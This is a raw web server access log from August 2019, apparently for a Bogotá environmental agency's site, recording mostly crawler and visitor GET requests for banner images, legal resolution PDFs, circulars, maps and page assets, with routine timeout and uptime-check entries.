69.30.226.234 - - [09/Aug/2019:00:51:48 -0500] "GET /galeria/nivo-slider/demo/images/Ni%C3%B1osCafam3_1.jpg HTTP/1.1" 200 167996
69.30.226.234 - - [09/Aug/2019:00:52:00 -0500] "GET /galeria/nivo-slider/demo/images/Otorgamiento-excelencia-ambiental-Jos%C3%A9-Celestino-Mutis-2.jpg HTTP/1.1" 200 276467
69.30.226.234 - - [09/Aug/2019:00:52:13 -0500] "GET /galeria/nivo-slider/demo/images/Premiaci%C3%B3nJBB.png HTTP/1.1" 200 258352
69.30.226.234 - - [09/Aug/2019:00:52:23 -0500] "GET /galeria/nivo-slider/demo/images/Rutas%20de%20recolecci%C3%B3n%20banner.jpg HTTP/1.1" 200 181783
69.30.226.234 - - [09/Aug/2019:00:52:38 -0500] "GET /galeria/nivo-slider/demo/images/Secretar%C3%AD-Banner-rio-bogota-car-sda.jpg HTTP/1.1" 200 339578
69.30.226.234 - - [09/Aug/2019:00:53:13 -0500] "GET /galeria/nivo-slider/demo/images/adqusici%C3%B3n.jpg HTTP/1.1" 200 187798
69.30.226.234 - - [09/Aug/2019:00:53:24 -0500] "GET /galeria/nivo-slider/demo/images/banner%20Secretar%C3%ADa%20de%20ambiente.png HTTP/1.1" 200 596624
69.30.226.234 - - [09/Aug/2019:00:53:37 -0500] "GET /galeria/nivo-slider/demo/images/banner%20web%20condecoraci%C3%B3n%20Augusto%20Angel-01-min.jpg HTTP/1.1" 200 196851
186.144.180.142 - - [09/Aug/2019:00:53:48 -0500] "-" 408 -
186.144.180.142 - - [09/Aug/2019:00:53:49 -0500] "-" 408 -
69.30.226.234 - - [09/Aug/2019:00:53:52 -0500] "GET /galeria/nivo-slider/demo/images/banner%20web%20semana%20eco%20peque%C3%B1o.jpg HTTP/1.1" 200 77068
69.30.226.234 - - [09/Aug/2019:00:54:04 -0500] "GET /galeria/nivo-slider/demo/images/bannerApag%C3%B3n.jpg HTTP/1.1" 200 53747
69.30.226.234 - - [09/Aug/2019:00:54:16 -0500] "GET /galeria/nivo-slider/demo/images/bannercampa%C3%B1acambiodesede.jpg HTTP/1.1" 200 134156
69.30.226.234 - - [09/Aug/2019:00:54:28 -0500] "GET /galeria/nivo-slider/demo/images/bannercapacitaci%C3%B3ninfraestructuavegetada.jpg HTTP/1.1" 200 360496
207.46.13.4 - - [09/Aug/2019:00:54:29 -0500] "GET /galeria/galeria/fotos/4humedal-Burro4G.jpg HTTP/1.1" 200 98452
69.30.226.234 - - [09/Aug/2019:00:54:42 -0500] "GET /galeria/nivo-slider/demo/images/bannerinvitaci%C3%B3nacaminatasecologicas2.jpg HTTP/1.1" 200 513253
40.77.167.98 - - [09/Aug/2019:00:54:50 -0500] "GET /portalsiaccapacitaciones/Listas%20de%20Asistencia%202015/L.A-MT5-21May2015.pdf HTTP/1.1" 200 833229
69.30.226.234 - - [09/Aug/2019:00:54:56 -0500] "GET /galeria/nivo-slider/demo/images/bannerwebcampa%C3%B1amusgo.jpg HTTP/1.1" 200 291753
192.168.175.104 - - [09/Aug/2019:00:55:01 -0500] "GET / HTTP/1.0" 200 9990
69.30.226.234 - - [09/Aug/2019:00:55:13 -0500] "GET /galeria/nivo-slider/demo/images/bannerwebcampa%C3%B1amusgo2.jpg HTTP/1.1" 200 757384
192.168.175.104 - - [09/Aug/2019:00:55:14 -0500] "GET / HTTP/1.1" 200 9990
69.30.226.234 - - [09/Aug/2019:00:55:24 -0500] "GET /galeria/nivo-slider/demo/images/bannerwebcampa%C3%B1amusgo3.jpg HTTP/1.1" 200 277175
66.249.64.145 - - [09/Aug/2019:00:55:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3251.pdf HTTP/1.1" 200 764575
69.30.226.234 - - [09/Aug/2019:00:55:39 -0500] "GET /galeria/nivo-slider/demo/images/condecoracionalaeducaci%C3%B3nambiental.jpg HTTP/1.1" 200 196078
69.30.226.234 - - [09/Aug/2019:00:55:52 -0500] "GET /galeria/nivo-slider/demo/images/no-atenci%C3%B3n.jpg HTTP/1.1" 200 104993
69.162.124.233 - - [09/Aug/2019:00:56:00 -0500] "HEAD / HTTP/1.1" 200 -
69.30.226.234 - - [09/Aug/2019:00:56:03 -0500] "GET /portalsiaccapacitaciones/Soportes%20Capacitaciones%202017/Gestio%CC%81n%20Integral%20RCD.pptx HTTP/1.1" 404 1019
66.249.64.145 - - [09/Aug/2019:00:56:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1806.pdf HTTP/1.1" 200 479052
66.249.64.147 - - [09/Aug/2019:00:56:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1265.pdf HTTP/1.1" 200 652375
66.249.64.145 - - [09/Aug/2019:00:56:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3170.pdf HTTP/1.1" 200 477705
66.249.64.145 - - [09/Aug/2019:00:56:47 -0500] "GET /BLA/resoluciones/AUTOS%202012/1852.pdf HTTP/1.1" 200 274664
66.249.64.145 - - [09/Aug/2019:00:58:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/4050.pdf HTTP/1.1" 200 437103
66.249.64.147 - - [09/Aug/2019:00:58:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8765.pdf HTTP/1.1" 200 56052
66.249.64.145 - - [09/Aug/2019:00:58:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1155.pdf HTTP/1.1" 200 503310
66.249.64.145 - - [09/Aug/2019:00:59:18 -0500] "GET /BLA/resoluciones/AUTOS%202010/3079.pdf HTTP/1.1" 200 239408
66.249.64.147 - - [09/Aug/2019:00:59:34 -0500] "GET /BLA/resoluciones/AUTOS%202010/6682.pdf HTTP/1.1" 200 143533
192.168.175.104 - - [09/Aug/2019:00:59:59 -0500] "GET / HTTP/1.0" 200 9990
66.249.64.147 - - [09/Aug/2019:01:00:11 -0500] "GET /BLA/resoluciones/Autos%202008/0393.pdf HTTP/1.1" 200 80304
192.168.175.104 - - [09/Aug/2019:01:00:12 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.145 - - [09/Aug/2019:01:00:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3032.pdf HTTP/1.1" 200 532609
66.249.64.145 - - [09/Aug/2019:01:00:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7305.pdf HTTP/1.1" 200 379312
69.162.124.233 - - [09/Aug/2019:01:01:00 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.145 - - [09/Aug/2019:01:01:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5378.pdf HTTP/1.1" 200 582533
66.249.64.145 - - [09/Aug/2019:01:01:26 -0500] "GET /BLA/resoluciones/AUTOS%202012/1759.pdf HTTP/1.1" 200 269731
66.249.64.145 - - [09/Aug/2019:01:01:42 -0500] "GET /BLA/resoluciones/AUTOS%202012/1837.pdf HTTP/1.1" 200 275312
66.249.64.145 - - [09/Aug/2019:01:01:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9079.pdf HTTP/1.1" 200 488165
190.146.162.96 - - [09/Aug/2019:01:01:55 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 8778
66.249.64.145 - - [09/Aug/2019:01:01:59 -0500] "GET /BLA/resoluciones/AUTOS%202016/2995.pdf HTTP/1.1" 200 444932
190.146.162.96 - - [09/Aug/2019:01:01:51 -0500] "GET /BLA/boletinlegal/index.php? HTTP/1.1" 200 16331
66.249.64.145 - - [09/Aug/2019:01:02:09 -0500] "GET /sig/CALIDAD/NORMATIVIDAD/NTC-ISO14001%202004.pdf HTTP/1.1" 404 1018
40.77.167.98 - - [09/Aug/2019:01:02:21 -0500] "GET /PORTAL_SIAC/swf/videos/Ramodeamero.jpg HTTP/1.1" 200 31340
190.146.162.96 - - [09/Aug/2019:01:02:22 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=PEV&fecha=2019&resuelve= HTTP/1.1" 200 3647
66.249.64.145 - - [09/Aug/2019:01:02:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/5109.pdf HTTP/1.1" 200 454564
66.249.64.42 - - [09/Aug/2019:01:02:26 -0500] "GET / HTTP/1.1" 200 9990
190.146.162.96 - - [09/Aug/2019:01:02:27 -0500] "GET /BLA/resoluciones/AUTOS%202019/0764.pdf HTTP/1.1" 200 6073198
66.249.64.145 - - [09/Aug/2019:01:02:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5650.pdf HTTP/1.1" 200 676741
66.249.64.147 - - [09/Aug/2019:01:02:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5222.pdf HTTP/1.1" 200 521133
42.156.254.74 - - [09/Aug/2019:01:02:42 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
42.156.254.74 - - [09/Aug/2019:01:02:42 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
42.156.254.74 - - [09/Aug/2019:01:02:42 -0500] "GET /galeria/nivo-slider/demo/demo.html HTTP/1.1" 200 4781
42.156.254.74 - - [09/Aug/2019:01:02:42 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
42.156.254.77 - - [09/Aug/2019:01:02:42 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
42.156.254.77 - - [09/Aug/2019:01:02:42 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
42.156.254.73 - - [09/Aug/2019:01:02:43 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
42.156.254.73 - - [09/Aug/2019:01:02:43 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
66.249.64.147 - - [09/Aug/2019:01:03:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0516.pdf HTTP/1.1" 200 655898
66.249.64.145 - - [09/Aug/2019:01:03:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/3694.pdf HTTP/1.1" 200 52613
190.146.162.96 - - [09/Aug/2019:01:03:11 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=AIRE&fecha=2019&resuelve= HTTP/1.1" 200 13190
190.146.162.96 - - [09/Aug/2019:01:03:16 -0500] "GET /BLA/resoluciones/AUTOS%202019/1605.pdf HTTP/1.1" 200 322539
66.249.64.145 - - [09/Aug/2019:01:03:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0752.pdf HTTP/1.1" 200 579799
66.249.64.145 - - [09/Aug/2019:01:03:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8835.pdf HTTP/1.1" 200 566022
66.249.64.145 - - [09/Aug/2019:01:03:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/4331.pdf HTTP/1.1" 200 422184
66.249.64.145 - - [09/Aug/2019:01:03:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4505.pdf HTTP/1.1" 200 527387
66.249.64.145 - - [09/Aug/2019:01:03:55 -0500] "GET /BLA/resoluciones/AUTOS%202015/1312.pdf HTTP/1.1" 200 754655
66.249.64.147 - - [09/Aug/2019:01:04:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1351.pdf HTTP/1.1" 200 519796
66.249.64.145 - - [09/Aug/2019:01:04:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1320.pdf HTTP/1.1" 200 185515
66.249.64.27 - - [09/Aug/2019:01:04:18 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2022%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 1563219
66.249.64.149 - - [09/Aug/2019:01:04:20 -0500] "GET /resoluciones/RESOLUCIONES%202007/RES%202007%202801%20AL%202900/RESOLUCION%202836%20DE%202007.pdf HTTP/1.1" 404 1018
66.249.64.147 - - [09/Aug/2019:01:04:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/5175.pdf HTTP/1.1" 200 64017
66.249.64.149 - - [09/Aug/2019:01:04:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2468.pdf HTTP/1.1" 200 417680
66.249.64.147 - - [09/Aug/2019:01:04:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6272.pdf HTTP/1.1" 200 429903
66.249.64.145 - - [09/Aug/2019:01:04:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/4932.pdf HTTP/1.1" 200 217812
192.168.175.104 - - [09/Aug/2019:01:04:58 -0500] "GET / HTTP/1.0" 200 9990
192.168.175.104 - - [09/Aug/2019:01:05:10 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.147 - - [09/Aug/2019:01:05:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8530.pdf HTTP/1.1" 200 522650
66.249.64.145 - - [09/Aug/2019:01:05:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0069.pdf HTTP/1.1" 200 371415
66.249.64.145 - - [09/Aug/2019:01:05:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9392.pdf HTTP/1.1" 200 469049
66.249.64.145 - - [09/Aug/2019:01:05:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0144.pdf HTTP/1.1" 200 306087
66.249.64.147 - - [09/Aug/2019:01:05:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/2582.pdf HTTP/1.1" 200 76886
66.249.64.145 - - [09/Aug/2019:01:05:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2561.pdf HTTP/1.1" 200 424203
69.162.124.233 - - [09/Aug/2019:01:06:00 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.145 - - [09/Aug/2019:01:06:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/2175.pdf HTTP/1.1" 200 374781
66.249.64.147 - - [09/Aug/2019:01:06:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/5264.pdf HTTP/1.1" 200 336346
66.249.64.147 - - [09/Aug/2019:01:06:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1637.pdf HTTP/1.1" 200 231575
66.249.64.145 - - [09/Aug/2019:01:06:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2509.pdf HTTP/1.1" 200 329792
66.249.64.147 - - [09/Aug/2019:01:06:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9521.pdf HTTP/1.1" 200 386150
66.249.64.147 - - [09/Aug/2019:01:06:51 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/humedales/sitio/22_pol/xtras/1.pdf HTTP/1.1" 404 1018
66.249.64.145 - - [09/Aug/2019:01:06:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1037.pdf HTTP/1.1" 200 213643
66.249.64.145 - - [09/Aug/2019:01:06:54 -0500] "GET /BLA/resoluciones/AUTOS%202015/2285.pdf HTTP/1.1" 200 568358
66.249.64.145 - - [09/Aug/2019:01:07:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/3091.pdf HTTP/1.1" 200 477064
66.249.64.145 - - [09/Aug/2019:01:07:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/1121.pdf HTTP/1.1" 200 379288
66.249.64.145 - - [09/Aug/2019:01:07:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6202.pdf HTTP/1.1" 200 119922
45.86.245.113 - - [09/Aug/2019:01:07:15 -0500] "-" 408 -
190.146.162.96 - - [09/Aug/2019:01:07:18 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 8778
66.249.64.145 - - [09/Aug/2019:01:07:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3274.pdf HTTP/1.1" 200 593063
190.146.162.96 - - [09/Aug/2019:01:07:12 -0500] "GET /BLA/boletinlegal/index.php? HTTP/1.1" 200 16331
66.249.64.149 - - [09/Aug/2019:01:07:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2118.pdf HTTP/1.1" 200 542895
66.249.64.145 - - [09/Aug/2019:01:07:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0465.pdf HTTP/1.1" 200 237422
190.146.162.96 - - [09/Aug/2019:01:07:34 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=AIRE&fecha=2018&resuelve= HTTP/1.1" 200 97138
66.249.64.145 - - [09/Aug/2019:01:07:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4522.pdf HTTP/1.1" 200 425383
190.146.162.96 - - [09/Aug/2019:01:07:39 -0500] "GET /BLA/resoluciones/AUTOS%202018/5958.pdf HTTP/1.1" 200 317383
66.249.64.145 - - [09/Aug/2019:01:07:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7983.pdf HTTP/1.1" 200 512580
66.249.64.145 - - [09/Aug/2019:01:07:48 -0500] "GET /BLA/boletinlegal/circulares/7-2012-SDA.pdf HTTP/1.1" 200 972955
66.249.64.145 - - [09/Aug/2019:01:07:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/2758.pdf HTTP/1.1" 200 192377
66.249.64.147 - - [09/Aug/2019:01:07:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0765.pdf HTTP/1.1" 200 170504
66.249.64.147 - - [09/Aug/2019:01:07:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0733.pdf HTTP/1.1" 200 358208
66.249.64.145 - - [09/Aug/2019:01:07:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6656.pdf HTTP/1.1" 200 493305
66.249.64.145 - - [09/Aug/2019:01:07:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4643.pdf HTTP/1.1" 200 548311
66.249.64.145 - - [09/Aug/2019:01:08:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5867.pdf HTTP/1.1" 200 230271
66.249.64.145 - - [09/Aug/2019:01:08:05 -0500] "GET /BLA/boletinlegal/Circulares/2015/2015.2015.php2015.pdf HTTP/1.1" 200 379
66.249.64.147 - - [09/Aug/2019:01:08:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2049.pdf HTTP/1.1" 200 729290
66.249.64.147 - - [09/Aug/2019:01:08:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6914.pdf HTTP/1.1" 200 161668
66.249.64.189 - - [09/Aug/2019:01:08:11 -0500] "GET /robots.txt HTTP/1.1" 404 1019
66.249.64.187 - - [09/Aug/2019:01:08:11 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/x%20restauracion/sitio/22_proye/xtras_in/cni_3.pdf HTTP/1.1" 404 1019
190.146.162.96 - - [09/Aug/2019:01:08:11 -0500] "GET /BLA/resoluciones/AUTOS%202018/5651.pdf HTTP/1.1" 200 320167
66.249.64.151 - - [09/Aug/2019:01:08:15 -0500] "GET /BLA/resoluciones/AUTOS%202012/0500.pdf HTTP/1.1" 200 650795
66.249.64.145 - - [09/Aug/2019:01:08:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/0192.pdf HTTP/1.1" 200 356852
66.249.64.147 - - [09/Aug/2019:01:08:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/3990.pdf HTTP/1.1" 200 464288
66.249.64.145 - - [09/Aug/2019:01:08:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7650.pdf HTTP/1.1" 200 496305
66.249.64.149 - - [09/Aug/2019:01:08:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0304.pdf HTTP/1.1" 200 267164
66.249.64.151 - - [09/Aug/2019:01:08:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2318.pdf HTTP/1.1" 200 585450
66.249.64.147 - - [09/Aug/2019:01:08:38 -0500] "GET /BLA/resoluciones/AUTOS%202013/3011.pdf HTTP/1.1" 200 575301
66.249.64.149 - - [09/Aug/2019:01:08:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7136.pdf HTTP/1.1" 200 632304
66.249.64.149 - - [09/Aug/2019:01:08:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/5200.pdf HTTP/1.1" 200 61233
66.249.64.149 - - [09/Aug/2019:01:08:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1880.pdf HTTP/1.1" 200 204441
66.249.64.147 - - [09/Aug/2019:01:08:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7306.pdf HTTP/1.1" 200 358642
66.249.64.147 - - [09/Aug/2019:01:08:47 -0500] "GET /BLA/resoluciones/AUTOS%202015/1251.pdf HTTP/1.1" 200 626162
66.249.64.147 - - [09/Aug/2019:01:08:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9157.pdf HTTP/1.1" 200 436967
66.249.64.145 - - [09/Aug/2019:01:08:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7041.pdf HTTP/1.1" 200 723073
66.249.64.28 - - [09/Aug/2019:01:09:00 -0500] "GET /BLA/boletinlegal/Directivas/2009/Directiva%20No.%20del%2023%20de%20Diciembre%20de%202009.pdf HTTP/1.1" 200 1636862
66.249.64.46 - - [09/Aug/2019:01:09:03 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/restauracion/sitio/22_proye/xtras_in/3a.pdf HTTP/1.1" 404 1018
66.249.64.149 - - [09/Aug/2019:01:09:07 -0500] "GET /BLA/resoluciones/AUTOS%202013/1516.pdf HTTP/1.1" 200 2142190
66.249.64.155 - - [09/Aug/2019:01:09:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/5639.pdf HTTP/1.1" 200 209973
66.249.64.147 - - [09/Aug/2019:01:09:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4912.pdf HTTP/1.1" 200 708740
66.249.64.157 - - [09/Aug/2019:01:09:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6664.pdf HTTP/1.1" 200 460290
66.249.64.157 - - [09/Aug/2019:01:09:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/3611.pdf HTTP/1.1" 200 791210
66.249.64.147 - - [09/Aug/2019:01:09:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2158.pdf HTTP/1.1" 200 514905
66.249.64.145 - - [09/Aug/2019:01:09:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/5447.pdf HTTP/1.1" 200 273697
66.249.64.153 - - [09/Aug/2019:01:09:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4816.pdf HTTP/1.1" 200 177325
66.249.64.149 - - [09/Aug/2019:01:09:40 -0500] "GET /resoluciones/RESOLUCIONES%202009/1330.pdf HTTP/1.1" 404 1018
207.46.13.59 - - [09/Aug/2019:01:09:41 -0500] "GET /SIG/Gestion%20Recursos%20Financieros/126PA02-PR29%20CONSTITUCION%20Y%20MANEJO%20CAJA%20MENOR.pdf HTTP/1.1" 200 412919
66.249.64.151 - - [09/Aug/2019:01:09:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8004.pdf HTTP/1.1" 200 216747
66.249.64.147 - - [09/Aug/2019:01:09:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6958.pdf HTTP/1.1" 200 266486
66.249.64.147 - - [09/Aug/2019:01:09:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8476.pdf HTTP/1.1" 200 48416
192.168.175.104 - - [09/Aug/2019:01:09:56 -0500] "GET / HTTP/1.0" 200 9990
66.249.64.149 - - [09/Aug/2019:01:09:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/3402.pdf HTTP/1.1" 200 253105
66.249.64.147 - - [09/Aug/2019:01:10:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0082.pdf HTTP/1.1" 200 415408
66.249.64.149 - - [09/Aug/2019:01:10:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%203001%20AL%203100/RESOLUCION%203084%20DE%202007.pdf HTTP/1.1" 200 198151
66.249.64.151 - - [09/Aug/2019:01:10:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1340.pdf HTTP/1.1" 200 508251
192.168.175.104 - - [09/Aug/2019:01:10:08 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.145 - - [09/Aug/2019:01:10:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5219.pdf HTTP/1.1" 200 525553
66.249.64.149 - - [09/Aug/2019:01:10:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3731.pdf HTTP/1.1" 200 335932
69.162.124.233 - - [09/Aug/2019:01:11:00 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.147 - - [09/Aug/2019:01:11:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1681.pdf HTTP/1.1" 200 128824
216.244.66.195 - - [09/Aug/2019:01:11:16 -0500] "GET /robots.txt HTTP/1.1" 404 1018
66.249.64.27 - - [09/Aug/2019:01:11:22 -0500] "GET /BLA/boletinlegal/Directivas/2012/Directiva%20No.%201%20del%2030%20de%20octubre%20de%202012.pdf HTTP/1.1" 200 1522771
66.249.64.29 - - [09/Aug/2019:01:11:25 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%205%20del%2013%20de%20junio%20de%202013.pdf HTTP/1.1" 200 110904
104.131.147.112 - - [09/Aug/2019:01:11:47 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.145 - - [09/Aug/2019:01:12:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3306.pdf HTTP/1.1" 200 683588
181.49.85.13 - - [09/Aug/2019:01:12:04 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
181.49.85.13 - - [09/Aug/2019:01:12:04 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.49.85.13 - - [09/Aug/2019:01:12:04 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.49.85.13 - - [09/Aug/2019:01:12:08 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.49.85.13 - - [09/Aug/2019:01:12:08 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.49.85.13 - - [09/Aug/2019:01:12:08 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
181.49.85.13 - - [09/Aug/2019:01:12:08 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.49.85.13 - - [09/Aug/2019:01:12:08 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.49.85.13 - - [09/Aug/2019:01:12:08 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
189.153.178.176 - - [09/Aug/2019:01:12:31 -0500] "GET /POT-2013/Cartografia/15_Sistema%20de%20Movilidad%20_Secciones%20Viales_Circuitos_movilida.pdf HTTP/1.1" 200 4830571
189.153.178.176 - - [09/Aug/2019:01:12:31 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
66.249.64.149 - - [09/Aug/2019:01:13:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6447.pdf HTTP/1.1" 200 68800
66.249.64.29 - - [09/Aug/2019:01:13:57 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%208%20del%2020%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 285158
66.249.64.147 - - [09/Aug/2019:01:14:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7732.pdf HTTP/1.1" 200 566186
66.249.64.30 - - [09/Aug/2019:01:14:24 -0500] "GET /robots.txt HTTP/1.1" 404 1015
66.249.64.31 - - [09/Aug/2019:01:14:24 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2012%20del%2028%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 369945
66.249.64.145 - - [09/Aug/2019:01:14:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3799.pdf HTTP/1.1" 200 135466
192.168.175.104 - - [09/Aug/2019:01:14:54 -0500] "GET / HTTP/1.0" 200 9990
66.249.64.145 - - [09/Aug/2019:01:15:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6237.pdf HTTP/1.1" 200 485853
192.168.175.104 - - [09/Aug/2019:01:15:06 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.145 - - [09/Aug/2019:01:15:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2997.pdf HTTP/1.1" 200 615444
66.249.64.29 - - [09/Aug/2019:01:15:20 -0500] "GET /POT-2013/Cartografia/09_EEP.pdf HTTP/1.1" 200 3326963
66.249.64.147 - - [09/Aug/2019:01:15:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4674.pdf HTTP/1.1" 200 239949
66.249.64.29 - - [09/Aug/2019:01:15:47 -0500] "GET /BLA/boletinlegal/circulares/2009IE24690.pdf HTTP/1.1" 200 74941
69.162.124.233 - - [09/Aug/2019:01:16:00 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.145 - - [09/Aug/2019:01:16:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6939.pdf HTTP/1.1" 200 623285
